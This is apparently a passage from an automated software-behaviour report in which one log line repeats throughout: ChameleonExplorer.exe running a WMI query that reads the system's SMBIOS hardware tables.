                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
